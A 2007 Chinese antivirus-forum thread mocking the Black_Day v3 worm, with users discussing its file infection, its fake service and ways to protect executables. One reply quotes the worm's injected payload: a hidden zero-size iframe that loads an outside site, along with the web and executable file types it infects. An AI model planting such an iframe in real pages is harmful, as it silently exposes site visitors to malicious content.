瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 挖苦一下恶性蠕虫Black_Day第三版
baohe - 2007-4-15 15:20:00

1、没人阻拦你呀!怎么就自尽了?自己都觉得丢人?



附件: 1558472007415151025.jpg
baohe - 2007-4-15 15:21:00
2、“牙好,胃口就好啊!身体倍儿棒!吃嘛儿嘛儿香!”

所有类型的文件————统吃!

你可真牛啊!

执行速度太烂了吧?替换文件的速度咋就像蜗牛爬?不敢恭维!

俺可不等你了。俺要采取措施请你出去了。



附件: 1558472007415151120.jpg
baohe - 2007-4-15 15:21:00
3、还搞了个劳什子“服务”?

索性就顺手再加个驱动吧,rootkit之类。这样,还显得热闹点儿。

服务名咋胡乱写了个Sysintevet?

拜托啊!敬业一点儿好不好?

既然显示的描述是internet 网络服务事件,那就写个Web_srv_event好不好?这样,可能还能打个马虎眼,糊弄一下菜鸟们。

附件: 1558472007415151200.jpg
baohe - 2007-4-15 15:22:00
4、不好意思哈,让您老暴尸街头了。

附件: 1558472007415151238.jpg
xxtuzi - 2007-4-15 15:30:00
哈哈
火影忍者 - 2007-4-15 15:34:00
猫叔.图二是什么工具来着...
yulf - 2007-4-15 15:34:00
哈哈。好少见猫叔发这样的贴子。。。。。
baohe - 2007-4-15 15:36:00
引用:
【yulf的贴子】哈哈。好少见猫叔发这样的贴子。。。。。
………………


只是觉得作者这小子太贪婪。

人心不足蛇吞象。
孤独更可靠 - 2007-4-15 15:40:00
呵呵,学习了

早上测试时候忘记开文件和注册表监控的了

很遗憾,没有记录下来.555~

看来覆盖EXE文件病毒将成为主流了..

他们的思路很明确..

似乎想覆盖杀软和安全工具的可执行文件....



我是来来 - 2007-4-15 15:45:00
学习
天月来了 - 2007-4-15 16:21:00
就是了。一切可执行的才是病毒最想要干的。

我可多重方法保护文件,U盘里的可执行文件,我都是去了扩展名的。

用时复制一个,再加上原来扩展名。

就怕以后干脆啥文件都通吃,连我这没扩展名的,都吃就烦了。
goto2 - 2007-4-16 3:24:00
请问猫叔;只装瑞星防火墙.防漏墙跟SSM只上网不下载,能管用吗?能防得了那些带毒的网站吗?
天月来了 - 2007-4-16 7:53:00
啥只上网不下载??????????

你既然上网,就是在下载网页文件,不下载网页文件,你看啥???????

两个铁球 - 2007-4-16 8:02:00
版主看来对tiny是情有独钟啊!听CA说tiny已被CA收购了,并将其整合进了CA的防火墙。为什么版主不将tiny升级成CA咧?
试了一下也许是tiny没卸净,CA装不成。
两个铁球 - 2007-4-16 8:10:00
引用:
【天月来了的贴子】就是了。一切可执行的才是病毒最想要干的。

我可多重方法保护文件,U盘里的可执行文件,我都是去了扩展名的。

用时复制一个,再加上原来扩展名。

就怕以后干脆啥文件都通吃,连我这没扩展名的,都吃就烦了。
………………

好聪明的法子,又受益了,谢啦!
taylor05771 - 2007-4-16 8:50:00
baohe
第三版的样本 给偶

zhz010266@njude.com.cn
mopery - 2007-4-16 14:40:00
.exe .msc .dll .scr .pif .com .asp .aspx .php .jsp .htm .html .lnk

<iframe src='http://www.dadayouxi.net/index.htm' width=0 height=0></iframe>

- -||| 感染得真多..阿门..
新版小欧 - 2007-4-16 16:41:00
这年头,越来越恶咯~~~~~
天月来了 - 2007-4-16 17:09:00
恶的还没进国门呢!!!!!

那外面的,都吓死人了,今看一贴,我们这的所有小工具,都如摆设。

非得用外的,西的,看不懂的那些个工具。

我都快学疯了。

不能受了。
1
查看完整版本: 挖苦一下恶性蠕虫Black_Day第三版